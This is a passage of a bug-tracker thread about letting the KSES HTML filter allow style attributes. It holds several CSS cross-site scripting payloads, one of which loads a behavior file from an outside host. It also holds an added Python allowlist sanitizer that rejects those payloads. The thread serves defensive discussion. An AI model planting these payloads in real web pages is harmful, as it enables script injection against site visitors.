When allowing "style" attributes, KSES automatically
strips out anything with the colon due to the
bad_protocol* functions. Please make it so styling is
still capable when allowed.
Logged In: NO
I'll think about it. You do realize that both the style tag and
the style attribute cause security vulnerabilities?
// Ulf Harnhammar
Logged In: YES
user_id=1281259
I too would like to see this feature added, but there are some
XSS techniques that you would have to be on guard for,
such as:
<XSS STYLE="xss:expression(alert('XSS'))">
<IMG STYLE="xss:expr/*XSS*/ession(alert('XSS'))">
<IMG STYLE="behavior: url(http://ha.ckers.org/xss.htc)">
<IMG STYLE="background:url("javascript:alert('XSS')")">;
Just a tip if anyone does do this feature, because XSS
attacks are possible if you allow all style tags. The style
tag itself shouldn't really be needed as much as the
attributes, as many elements use them, and they are supposed
to be better for formatting than <FONT> <B> <I> etc...
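An allowlist approach to the problem raised in this thread, added here as an illustration in Python (it is not KSES code): each "property: value" pair is checked on its own, so the colon no longer has to be stripped, and the vectors quoted above are rejected either by property name or by value content. The property list and the keyword list are constructed for the example.

```python
import re

# Constructed allowlist of properties worth permitting for inline formatting.
ALLOWED_PROPERTIES = {"color", "background-color", "font-weight", "font-style",
                      "font-size", "text-align", "text-decoration"}

_COMMENT = re.compile(r"/\*.*?\*/", re.S)                       # expr/*XSS*/ession
_ESCAPE = re.compile(r"\\(?:([0-9a-fA-F]{1,6})\s?|(.))", re.S)  # \65xpression
# Tokens that never belong in a plain formatting value, checked after decoding.
_DANGEROUS = re.compile(
    r"\b(expression|behavior|url|javascript|vbscript)\b|@import|[()<>\"']", re.I)
# Characters a keyword, length, percentage or hex colour can consist of.
_SAFE_VALUE = re.compile(r"^[-#\w\s.%]+$")

def _decode_escape(m):
    """Turn a CSS backslash escape into the character the browser would see."""
    if m.group(1) is not None:
        code = int(m.group(1), 16)
        return chr(code) if code <= 0x10FFFF else ""
    return m.group(2)

def normalize_css(value: str) -> str:
    """Remove the obfuscation layers (comments, escapes, NULs) before any check."""
    value = _COMMENT.sub("", value)
    value = _ESCAPE.sub(_decode_escape, value)
    return value.replace("\0", "")

def sanitize_style(style: str) -> str:
    """Return only the allowlisted, plainly-valued declarations of `style`."""
    kept = []
    for decl in normalize_css(style).split(";"):
        if ":" not in decl:
            continue                       # no property/value split, drop it
        prop, value = (part.strip() for part in decl.split(":", 1))
        prop = prop.lower()
        if prop not in ALLOWED_PROPERTIES:
            continue                       # "xss", "behavior", "background" ...
        if _DANGEROUS.search(value) or not _SAFE_VALUE.fullmatch(value):
            continue                       # url(), expression(), quotes, parens
        kept.append(f"{prop}: {value}")
    return "; ".join(kept)

if __name__ == "__main__":
    # Vectors quoted in the thread, each mixed with one harmless declaration.
    for attr in ["color: red; xss:expression(alert('XSS'))",
                 "xss:expr/*XSS*/ession(alert('XSS')); font-weight: bold",
                 "color:\\65xpression(alert(1)); text-align: center"]:
        print(repr(attr), "->", repr(sanitize_style(attr)))
```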
Logged In: YES
user_id=1065794
Originator: NO
See possible solution at http://sourceforge.net/tracker/index.php?func=detail&aid=1752954&group_id=81853&atid=564260